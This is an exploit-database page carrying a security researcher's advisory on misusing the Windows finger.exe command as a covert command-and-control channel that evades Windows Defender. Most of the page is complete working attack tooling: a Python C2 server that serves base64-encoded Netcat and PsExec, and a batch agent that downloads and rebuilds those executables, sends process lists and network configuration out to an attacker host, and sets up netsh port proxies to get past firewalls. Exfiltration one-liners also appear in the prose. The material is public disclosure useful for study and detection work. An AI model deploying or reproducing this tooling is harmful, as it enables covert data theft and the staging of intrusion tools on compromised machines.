To access the dashboard, Schedule scans, API and Search become a patron

Search for hundreds of thousands of exploits

"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software"

Author

Exploit author

hyp3rlinx

Platform

Exploit platform

windows

Release date

Exploit published date

2020-09-16

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
# Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software
# Author: John Page (aka hyp3rlinx)		
# Date: 2020-09-16
# Website: hyp3rlinx.altervista.org
# Source:  http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec

Microsoft Windows TCPIP Finger Command "finger.exe" that ships with the OS, can be used as a file downloader and makeshift C2 channel.
Legitimate use of Windows Finger Command is to send Finger Protocol queries to remote Finger daemons to retrieve user information.
However, the finger client can also save the remote server response to disk using the command line redirection operator ">".

Intruders who compromise a computer may find it is locked down and "unknown" applications may be unable to download programs or tools.
By using built-in native Windows programs, its possible they may be whitelisted by installed security programs and allowed to download files.

Redteams and such using LOL methods have made use of "Certutil.exe", native Windows program for downloading files. However, Certutil.exe is
recently blocked by Windows Defender Antivirus and logged as event "Trojan:Win32/Ceprolad.A" when it encounters http/https://.

Therefore, using Windows finger we can bypass current Windows Defender security restrictions to download tools, send commands and exfil data.
The Finger protocol as a C2 channel part works by abusing the "user" token of the FINGER Query protocol "user@host". C2 commands masked as
finger queries can download files and or exfil data without Windows Defender interference.

Download files:
C:\> finger <C2-Command>@HOST > Malwr.txt

Exfil running processes:
C:\> for /f "tokens=1" %i in ('tasklist') do finger %i@192.168.1.21

Typically, (Port 79) default port used by FINGER protocol is often blocked by organizations. Privileged users can bypass this using
Windows NetSh Portproxy. This can allow us to bypass Firewall restrictions to reach servers using unrestricted ports like 80/443.
Portproxy queries are then sent first to the Local Machines ip-address which are then forwarded to the C2 server specified.

Port 43 (WHOIS) traffic.
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79 connectaddress=[C2-Server] connectport=43
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43 connectaddress=[LOCAL-IP] connectport=79

To display Portproxy use "C:\>netsh interface portproxy show all".

E.g. using Port 79
Ncat64.exe "nc@C2-Server" > tmp.txt

E.g. using Portproxy, send the query to local-ip first.
Ncat64.exe "nc@Local-IP" > tmp.txt

To leverage Windows finger.exe successfully as a file downloader and help evade network security devices, serve Base64 encoded text-files.
DarkFinger.py expects to receive the first two characters of the filename for the Finger Protocol Host token part for file downloads.

DarkFinger C2 expects exfil data to prefixed with the dot "." character, so any arbitrary inbound querys are not confused for exfil.
This can be changed to whatever or even expanded upon to use XOR obfuscation methods etc... as this is just for basic PoC.

[Event Logs / Forensics]
Certutil.exe file downloads are now blocked and logged by Windows Defender.

"Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.

 	Name: Trojan:Win32/Ceprolad.A
 	ID: 2147726914
 	Severity: Severe
 	Category: Trojan
        ... etc"

PowerShell, also used as an LOL method to download files usually generates Windows event logs. Finger initiated downloads write
to disk and will leave forensic artifacts. Finger TCP/IP traffic going out to Port 80/443 minus the HTTP protocol may stand out as well.
However, searching the Windows event logs for finger.exe entries, I found no trace of it generating Windows event logs anywhere.

DarkFinger.py C2 is very basic with no security. It's only to demonstrate using Windows Finger Command for as a C2 channel
and show the possibilities. Therefore, anyone can request to change the Port DarkFinger C2 listens on and or download files.

During my research, I found nothing on the internet publicly using or documenting Windows TCPIP Finger Command for use as C2 channel.
Therefore, I release "DarkFinger.py" C2 server and "DarkFinger-Agent.bat" which calls the Windows finger.exe in attacker friendly ways.

Tested successfully Windows 10.
 

[DarkFinger-C2.py]
import socket,sys,re,time,os,argparse
from subprocess import *
from subprocess import Popen, PIPE, STDOUT

#DarkFinger / Windows Finger TCPIP Command C2 Server (c)
#Downloader and Covert Data Tunneler
#By John Page (aka hyp3rlinx)
#ApparitionSec
#twitter.com/hyp3rlinx
#
#File Downloads must be Base64 encoded text-files.
#Agents can change the port DarkFinger listens on dynamically:
#E.g. set to listen on port 80
#C:\>finger.exe !80!@DarkFinger-Server
#When not using Port 79, we need a Portproxy to send Port 79 traffic outbound to the specified Port.  
#Also, when using Ports other than Port 79 (default) we issue queries first to the machine running the Agent E.g.
#C:\>finger.exe <Command>@<Local-Machines-IP>
#
#Agents can change the Download wait time, to try an ensure files are fully downloaded before closing connections.
#Default time sent by the DF-Agent.bat PoC script is set to 10 seconds when issuing Download commands.
#Changing wait time before closing the socket when downloading PsExec64.exe E.g.
#C:\>finger.exe ps%<Wait-Time-Secs>%@%<DarkFinger-Server>%
#==============================================================================================================
#
port = 79                                    #Default if the client unable to Portproxy, use port 80/443 if possible.
downloads_dir = "Darkfinger_Downloads"       #Directory containing the Base64 encoded files for download
nc64 = downloads_dir+"\\nc.txt"              #Base64 encoded Netcat 
psexec = downloads_dir+"\\ps.txt"            #Base64 encoded PsExec64
byte_sz = 4096                               #Socket recv 
allowed_ports = [22,43,53,79,80,443]         #Restrict to a few.

BANNER="""
    ____             __   _______                      
   / __ \____ ______/ /__/ ____(_)___  ____ ____  _____
  / / / / __ `/ ___/ //_/ /_  / / __ \/ __ `/ _ \/ ___/
 / /_/ / /_/ / /  / ,< / __/ / / / / / /_/ /  __/ /    
/_____/\__,_/_/  /_/|_/_/   /_/_/ /_/\__, /\___/_/     
                                    /____/         v1
                                    
                           Finger TCPIP Command C2 Server
                                             By hyp3rlinx
                                            ApparitionSec
"""

def remove_cert_info(f):
    try:
        r1 = open(f)
        lines = r1.readlines()
        lines = lines[1:]
        r1.close()
        w1 = open(f,'w')
        w1.writelines(lines)
        w1.close()

        r2 = open(f)
        lines2 = r2.readlines()
        lines2 = lines2[:-1]
        r2.close()
        w2 = open(f,'w')
        w2.writelines(lines2)
        w2.close()
    except Exception as e:
        print(str(e))
        exit()
    

def create_base64_files(file_conf):
    global downloads_dir
    if os.path.exists(file_conf):
        if os.stat(file_conf).st_size == 0:
            print("[!] Warn: Supplied conf file is empty, no downloads were specified!")
            exit()
    else:
        print("[!] Supplied conf file does not exist :(")
        exit()
    try:
        path=os.getcwd()
        if not os.path.exists(path+"\\"+downloads_dir):
            os.makedirs(downloads_dir)
        f=open(file_conf, "r")
        for x in f:  
            x = x.strip()
            if os.path.exists(path+"\\"+x):
                proc = Popen(["certutil.exe", "-encode", path+"\\"+x, path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"],
                             stdout=PIPE, stderr=PIPE, shell=False)
                out, err = proc.communicate()
                if "ERROR_FILE_EXISTS" in str(out):
                    print("[!] Cannot encode " + x[:2]+".txt" + " as it already exists, delete it (-d flag) and try again :(")
                    exit()
                time.sleep(0.5)
                #Remove certificate info generated by Windows Certutil.
                if os.path.exists(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"):
                    remove_cert_info(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt")
                    print("[+] Created " + x + " Base64 encoded text-file "+x[:2].lower()+".txt" +" for download.")
            else:
                print("[!] Warn: File specified in the conf file to Base64 encode ("+x+") does not exist!")
                exit()
        f.close()
    except Exception as e:
        print(str(e))


def delete_base64_files():
    global downloads_dir
    path=os.getcwd()
    if os.path.exists(path+"\\"+downloads_dir):
        try:
            filelist = [ f for f in os.listdir(path+"\\"+downloads_dir) if f.endswith(".txt") ]
            for f in filelist:
                os.remove(os.path.join(path+"\\"+downloads_dir, f))
        except Exception as e:
            print(str(e))
            exit()
    
def B64Exec(t):
    payload=""
    try:
        f=open(t, "r")
        for x in f:
            payload += x
        f.close()
    except Exception as e:
        pass
        print(str(e))
        return 9
    return payload


def finga_that_box(cmd, victim):
    cmd = cmd.rstrip()
    if cmd[:1] != ".":
        cmd = cmd[0:2]
    if cmd == "nc":
        print("[+] Serving Nc64.exe")
        sys.stdout.flush()
        return nc64
    if cmd == "ps":
        print("[+] Serving PsExec64.exe")
        sys.stdout.flush()
        return psexec
    if cmd[:1] == ".":
        print("[+] Exfil from: "+ victim[0] + " " +cmd[1:])
        sys.stdout.flush()
    return False


def fileppe_fingaz():
    global byte_sz, port, allowed_ports
    delay=1
    s = socket.socket()
    host = ""
    try:
        if port in allowed_ports:
            s.bind((host, port))
            s.listen(5)
        else:
            print("[!] Port disallowed, you can add it to the 'allowed_ports' list.")
            exit()
    except Exception as e:
        print(str(e))
        exit()
    print("[/] Listening port:", str(port))
    sys.stdout.flush()
    try:
        while True:
            conn, addr = s.accept()
            a = conn.recv(byte_sz).decode() #Py 2
            #Let agent change port dynamically
            try:
                if a[:1]=="!":
                    idx = a.rfind("!")
                    if idx != -1:
                        port = str(a[1:idx])
                        if int(port) in allowed_ports:
                            port = int(port)
                            time.sleep(1)
                            conn.close()
                            s.close()
                            fileppe_fingaz()
                        else:
                            print("[!] Disallowed port change request from: %s" % addr[0])
                                
                #Let agent set time to wait dynamically.
                if a[:1] != "." and a[:1] != "!":
                    if re.search(r'\d\d', a[2:4]):
                        delay=int(a[2:4])
                        print("[-] Agent set the delay to: %d" % delay)
                        sys.stdout.flush()
            except Exception as e:
                print(str(e))
                pass
            t = finga_that_box(a, addr)
            if t:
                exe = B64Exec(t)
                if exe == 9:
                    conn.close()
                    continue
                if exe:
                    try:
                        conn.sendall(exe.encode())
                        time.sleep(delay)
                        conn.close()
                        delay=1
                    except Exception as e:
                        pass
                        #print(str(e))
                        sys.stdout.flush()
            conn.close()
            delay=1
        s.close()
    except Exception as e:
        print(str(e))
        pass
    finally:
        s.close()
        fileppe_fingaz()


def about():
    print("[+] Darkfinger is a basic C2 server that processes Windows TCPIP Finger Commands.")
    print(" ")
    print("[+] File download requests require the first two chars (lowercase) for the file we want,")
    print("[+] plus the wait time, this trys to ensure a full transmit before close the connection.")
    print("[+] Download Ncat64.exe and wait 30-secs before closing the socket:")
    print("[+] finger.exe nc30@DarkFinger > tmp.txt")
    print(" ")
    print("[+] Exfil Windows Tasklist using the '.' character used as the DarkFinger exfil flag:")
    print("[+] cmd /c for /f \"tokens=1\" %i in ('tasklist') do finger .%i@DarkFinger-Server")
    print("[+]")
    print("[+] If Port 79 is blocked, use Windows Netsh Portproxy to reach allowed internet Ports.")
    print("[+] Dynamically change the port Darkfinger C2 listens on to port 80:")
    print("[+] finger.exe !80!@DarkFinger-Server")
    print(" ")
    print("[+] DarkFinger-Agent.bat script is the client side component to demonstrate capabilities.")
    print("[+] Note: This is just a basic PoC with no type of real security whatsoever.")
    print("[+] Disclaimer: Author not responsible for any misuse and or damages by using this software.")


def main(args):

    global port
    print(BANNER)
    
    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    if args.about:
        about()
        exit()

    if args.port:
        port = int(args.port)

    if args.conf and args.delete:
        delete_base64_files()

    if args.conf:
        create_base64_files(args.conf)
    else:
        print("[!] Warn: No Base64 files created for download!, add required -c flag.")
        exit()
        
    fileppe_fingaz()


def parse_args():
    parser.add_argument("-p", "--port", help="C2 Server Port",  nargs="?")
    parser.add_argument("-c", "--conf", help="Textfile of tools to Base64 encode for download.",  nargs="?")
    parser.add_argument("-d", "--delete", nargs="?", const="1", help="Delete previously created Base64 encoded files on startup, -c required.")
    parser.add_argument("-a", "--about", nargs="?", const="1", help="Darkfinger information")
    return parser.parse_args()

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    main(parse_args())




[DarkFinger-Agent.bat]
@ECHO OFF
CLS

ECHO [+] Windows TCPIP Finger CMD Agent (c)
ECHO [+] For DarkFinger C2 Server PoC
ECHO [+] By hyp3rlinx
ECHO [+] ApparitionSec
ECHO  ===================================
@ECHO.

REM Default download save location.
CD \Users\%username%\Desktop
REM Default download delay time to try an ensure full transfer.
SET  DELAY=10
SET FAIL_MSG=[!] Attempted a failed Admin operation ugh :(

net session >nul 2>&1
IF %errorLevel% == 0 (
    ECHO [+] Got Admin privileges!.
    SET  /a Admin = 0
    GOTO Init
) ELSE  (
    ECHO [!] Agent running as non-admin, if you can escalate privs re-run the agent!.
    SET /a Admin = 1
	SET  DARK_PORT=79
    GOTO CheckOutbound79
)

:Init
for /f "tokens=1-2 delims=:" %%a in ('ipconfig^|find "IPv4"') do IF NOT DEFINED LOCAL_IP set LOCAL_IP=%%b
SET LOCAL_IP=%LOCAL_IP: =%
ECHO [+] Local IP: %LOCAL_IP%
REM default for non admin as cant set Portproxy.
SET /P DARK_IP="[+] DarkFinger C2 Host/IP: "
SET /P DARK_PORT="[+] DarkFinger C2 Port: "
IF NOT %DARK_PORT%==79 (
ECHO [!] Ports other than 79 typically require a Portproxy.
GOTO AddNetshPortProxy
) ELSE (
GOTO CmdOpt
)

:CheckOutbound79
ECHO [!] Must use the default Port 79 :( good luck.
SET /P CHKPORT="[+] Check if hosts reachable? Y to continue N to abort: "
SET CHKPORT=%CHKPORT: =%
 IF /I %CHKPORT% == y (
   SET /P DARK_IP="[+] DarkFinger C2 Host/IP: "
   cmd /c powershell "$c=New-Object System.Net.Sockets.TCPClient;try{$c.Connect('%DARK_IP%','%DARK_PORT%')}catch{};if(-Not $c.Connected){echo `n'[-] Port 79 unreachable :('}else{$c.Close();echo `n'[-] Port 79 reachable :)'}"
    ECHO.
  ) ELSE (
     ECHO [!] Aborting... :(
    GOTO Close
 )
 

:CmdOpt
ECHO  1.Download PsExec64
ECHO  2.Download Nc64
ECHO  3.Exfil Tasklist
ECHO  4.Exfil IP Config
ECHO  5.Remove Netsh PortProxy
ECHO  6.Change C2 Server Port - 22 43 53 79 80 443
ECHO  7.Show Current Portproxy
ECHO  8.Change Portproxy
ECHO  9.Delete Portproxy and exit
ECHO  10.Exit Agent
@ECHO.
SET /P doit="Select option: "
IF "%doit%"=="1" GOTO PsExec64
IF "%doit%"=="2" GOTO Nc64
IF "%doit%"=="3" GOTO ExfilTasklist
IF "%doit%"=="4" GOTO ExfilIPConfig
IF "%doit%"=="5" GOTO RemNetShPortProxy
IF "%doit%"=="6" GOTO ChgC2ServerPort
IF "%doit%"=="7" GOTO ShowPortProxy
IF "%doit%"=="8" GOTO ChgPortProxy
IF "%doit%"=="9" GOTO DelProxyNClose
IF "%doit%"=="10" GOTO Close


:ChgPortProxy
IF %Admin% == 0 (
 GOTO Init
) ELSE (
ECHO %FAIL_MSG%
@ECHO.
GOTO CmdOpt
)

:PsExec64
SET Tool=PS
ECHO [-] Downloading PsExec64.exe, saving to Desktop as PS.EXE
ECHO [-] Wait...
IF %DARK_PORT%==79 (
SET IP2USE=%DARK_IP%
) ELSE (
SET IP2USE=%LOCAL_IP%
)
call finger ps%DELAY%@%IP2USE% > tmp.txt
GOTO CleanFile


:Nc64
SET Tool=NC
ECHO [-] Downloading Nc64.exe, saving to Desktop as NC.EXE
ECHO [-] Wait...
IF %DARK_PORT%==79 (
SET IP2USE=%DARK_IP%
) ELSE (
SET IP2USE=%LOCAL_IP%
)
call finger nc%DELAY%@%IP2USE% > tmp.txt
GOTO CleanFile

REM remove first two lines of tmp.txt as contains Computer name.
:CleanFile
call cmd /c more +2 tmp.txt > %Tool%.txt
GOTO RemoveTmpFile

:RemoveTmpFile
call cmd /c del %CD%\tmp.txt
GOTO B64Exe

REM Reconstruct executable from the Base64 text-file.
:B64Exe
call certutil -decode %CD%\%Tool%.txt %CD%\%Tool%.EXE 1> nul
@ECHO.
call cmd /c del %CD%\%Tool%.txt
GOTO CmdOpt

:ExfilTasklist
REM uses "." prefix to flag as incoming exfil data.
IF "%DARK_PORT%"=="79" (
SET USE_IP=%DARK_IP%
) ELSE (
SET USE_IP=%LOCAL_IP%
)
cmd /c for /f "tokens=1" %%i in ('tasklist') do finger ."%%i"@%USE_IP%
GOTO CmdOpt

:ExfilIPConfig
REM uses "." prefix to flag as incoming exfil data.
IF "%DARK_PORT%"=="79" (
SET USE_IP=%DARK_IP%
) ELSE (
SET USE_IP=%LOCAL_IP%
)
cmd /c for /f "tokens=*" %%a in ('ipconfig /all') do  finger ".%%a"@%USE_IP%
GOTO CmdOpt


:DelProxyNClose
ECHO [!] Removing any previous Portproxy from registry and exiting.
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F  >nul 2>&1
ECHO [!] Exiting...
EXIT /B


:AddNetshPortProxy
SET OK=0
SET /P OK="[!] 1 to Continue:"
IF NOT %OK% EQU 1 (
 ECHO [!] Aborted...
 @ECHO.
 GOTO CmdOpt
)
ECHO [!] Removing any previous Portproxy from registry.
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F  >nul 2>&1
SET LOCAL_FINGER_PORT=79
IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%
IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%
IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
IF %Admin% == 0 netsh interface portproxy show all
GOTO CmdOpt

:RemNetShPortProxy
IF %Admin% == 1 (
ECHO %FAIL_MSG%
@ECHO.
GOTO CmdOpt
) ELSE (
ECHO [!] Removing NetSh PortProxy from registry.
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F  >nul 2>&1
)
IF %DARK_PORT%==79 (
GOTO CmdOpt
) ELSE (
GOTO Init
)

:ShowPortProxy
netsh interface portproxy show all
GOTO CmdOpt

REM Allows agent to change the DarkFinger C2 listener port.
:ChgC2ServerPort
IF %Admin% == 1 (
ECHO %FAIL_MSG%
@ECHO.
GOTO CmdOpt
)
SET /P TMP_PORT="[+] DarkFinger listener Port: "
IF %DARK_PORT%==79 finger !%TMP_PORT%!@%DARK_IP%
IF NOT %DARK_PORT%==79 finger !%TMP_PORT%!@%LOCAL_IP%
SET DARK_PORT=%TMP_PORT%
ECHO [!] Attempted to change the DarkFinger remote Port to %TMP_PORT%.
IF NOT %DARK_PORT%==79 ECHO [!] Non default finger port used, must set a new Portproxy. (
GOTO RemNetShPortProxy
) ELSE (
GOTO CmdOpt
)

:Close
EXIT /B


[PoC Video URL]
https://www.youtube.com/watch?v=cfbwS6zH7ks

[Network Access]
Remote


[Disclosure Timeline]
September 11, 2020 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
Release Date Title Type Platform Author
2020-11-20 "Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)" local windows ZwX
2020-11-20 "Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)" local windows "Vincent Wolterman"
2020-11-20 "Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit" local windows stresser
2020-11-20 "WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-11-20 "IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow" local windows "Paolo Stagno"
2020-11-19 "Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)" dos windows "Vincent Wolterman"
2020-11-19 "M/Monit 3.7.4 - Privilege Escalation" webapps multiple "Dolev Farhi"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "PESCMS TEAM 2.3.2 - Multiple Reflected XSS" webapps multiple icekam
2020-11-19 "M/Monit 3.7.4 - Password Disclosure" webapps multiple "Dolev Farhi"
Release Date Title Type Platform Author
2020-09-16 "Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software" local windows hyp3rlinx
2020-08-26 "Ericom Access Server x64 9.2.0 - Server-Side Request Forgery" webapps multiple hyp3rlinx
2020-07-07 "Microsoft Windows mshta.exe 2019 - XML External Entity Injection" remote xml hyp3rlinx
2020-06-12 "Avaya IP Office 11 - Password Disclosure" webapps multiple hyp3rlinx
2020-06-10 "HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)" remote multiple hyp3rlinx
2020-06-10 "WinGate 9.4.1.5998 - Insecure Folder Permissions" local windows hyp3rlinx
2020-04-21 "Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption" remote windows hyp3rlinx
2020-04-06 "Microsoft NET USE win10 - Insufficient Authentication Logic" local windows hyp3rlinx
2020-02-12 "HP System Event Utility - Local Privilege Escalation" local windows hyp3rlinx
2020-01-21 "NEOWISE CARBONFTP 1.4 - Weak Password Encryption" local windows hyp3rlinx
2020-01-17 "Trend Micro Maximum Security 2019 - Privilege Escalation" local windows hyp3rlinx
2020-01-17 "Trend Micro Maximum Security 2019 - Arbitrary Code Execution" local windows hyp3rlinx
2020-01-06 "Microsoft Outlook VCF cards - Denial of Service (PoC)" dos windows hyp3rlinx
2020-01-01 "Microsoft Windows .Group File - Code Execution" local windows hyp3rlinx
2019-12-03 "Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass" local xml hyp3rlinx
2019-12-02 "Microsoft Excel 2016 1901 - XML External Entity Injection" local xml hyp3rlinx
2019-12-02 "Visual Studio 2008 - XML External Entity Injection" local xml hyp3rlinx
2019-12-02 "Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions" local windows hyp3rlinx
2019-11-13 "ScanGuard Antivirus 2020 - Insecure Folder Permissions" local windows hyp3rlinx
2019-10-21 "Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution" local windows hyp3rlinx
2019-09-06 "Windows NTFS - Privileged File Access Enumeration" local windows hyp3rlinx
2019-08-14 "Windows PowerShell - Unsanitized Filename Command Execution" dos windows hyp3rlinx
2019-07-24 "Trend Micro Deep Discovery Inspector IDS - Security Bypass" remote multiple hyp3rlinx
2019-07-17 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow" remote windows hyp3rlinx
2019-07-16 "Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection" dos windows hyp3rlinx
2019-06-17 "HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write" dos windows hyp3rlinx
2019-05-03 "Windows PowerShell ISE - Remote Code Execution" local windows hyp3rlinx
2019-04-12 "Microsoft Internet Explorer 11 - XML External Entity Injection" local windows hyp3rlinx
2019-03-13 "Microsoft Windows - .reg File / Dialog Box Message Spoofing" dos windows hyp3rlinx
2019-01-23 "Microsoft Windows CONTACT - HTML Injection / Remote Code Execution" local windows hyp3rlinx
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48815/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.